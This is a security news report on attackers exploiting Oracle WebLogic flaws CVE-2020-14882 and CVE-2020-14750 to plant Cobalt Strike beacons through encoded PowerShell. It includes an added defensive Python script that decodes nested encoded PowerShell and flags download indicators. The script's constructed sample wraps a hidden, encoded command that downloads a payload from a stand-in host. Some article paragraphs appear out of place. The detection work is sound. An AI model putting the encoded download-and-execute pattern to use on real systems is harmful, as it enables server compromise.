Hackers are actively exploiting unpatched Oracle WebLogic servers vulnerable to CVE-2020-14882 to deploy Cobalt Strike beacons that give them persistent remote access to compromised devices.
Cobalt Strike is a legitimate penetration testing tool that hackers also use in post-exploitation tasks and to deploy so-called beacons that allow them to gain persistent remote access.
Incoming ransomware attacks
Since then, a related unauthenticated RCE vulnerability tracked as CVE-2020-14750, which also allows unauthenticated attackers to take over unpatched instances, was addressed by a security update released last weekend.
This latest series of attacks targeting vulnerable WebLogic instances started over the weekend, as SANS ISC operator Renato Marinho revealed in an advisory.
Attackers use a chain of base64-encoded PowerShell scripts to download and install Cobalt Strike payloads on unpatched Oracle WebLogic servers.
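For defenders triaging process-creation logs, the following added example (not from the advisory or the original article) peels nested layers of base64-encoded PowerShell and flags strings associated with payload downloads. It assumes each layer is passed through `-EncodedCommand` (base64 of UTF-16LE text); the sample command lines and the indicator list are constructed for illustration.

```python
import base64
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand, plus -ec.
ENC_ARG = re.compile(r"-(e[a-z]*)\s+([A-Za-z0-9+/=]{16,})", re.I)
# Strings commonly seen when a script fetches a remote payload (illustrative list).
INDICATORS = ("downloadstring", "downloadfile", "invoke-webrequest",
              "net.webclient", "start-bitstransfer")

def decode_layer(b64):
    """-EncodedCommand carries base64 of UTF-16LE text; return None if it is not."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except ValueError:  # covers binascii.Error and UnicodeDecodeError
        return None

def analyze(cmdline, max_depth=5):
    """Peel nested -EncodedCommand layers and report download indicators."""
    layers, current = [], cmdline
    for _ in range(max_depth):  # bound the number of layers we will unwrap
        decoded = None
        for m in ENC_ARG.finditer(current):
            flag = m.group(1).lower()
            if flag == "ec" or "encodedcommand".startswith(flag):
                decoded = decode_layer(m.group(2))
                if decoded is not None:
                    break
        if decoded is None:
            break
        layers.append(decoded)
        current = decoded
    text = " ".join([cmdline, *layers]).lower()
    return {"layers": layers, "hits": [i for i in INDICATORS if i in text]}

def _enc(script):  # helper used only to build the constructed samples below
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed sample command lines (not taken from the SANS ISC advisory).
_inner = "Invoke-WebRequest -Uri http://example.invalid/constructed -OutFile c.bin"
_mid = "powershell -nop -w hidden -enc " + _enc(_inner)
SAMPLE_EVENTS = [
    "powershell.exe -NoProfile -EncodedCommand " + _enc(_mid),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        result = analyze(event)
        print(len(result["layers"]), "layer(s);", "indicators:", result["hits"] or "none")
```

On a WebLogic host, any encoded PowerShell command line that unwraps to more than one layer is worth investigating regardless of whether an indicator string matches.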
Administrators were urged to patch their systems immediately
As both CVE-2020-14882 and CVE-2020-14750 can be easily exploited by unauthenticated attackers to take over vulnerable WebLogic servers, Oracle advises companies to apply the security updates immediately to block these attacks.
"Because of the seriousness of this vulnerability, Oracle recommends that customers implement the updates provided by this Security Alert as soon as possible after the implementation of the Critical Patch Update of October 2020," the company said in the weekend advisory.
Source of information: bleepingcomputer.com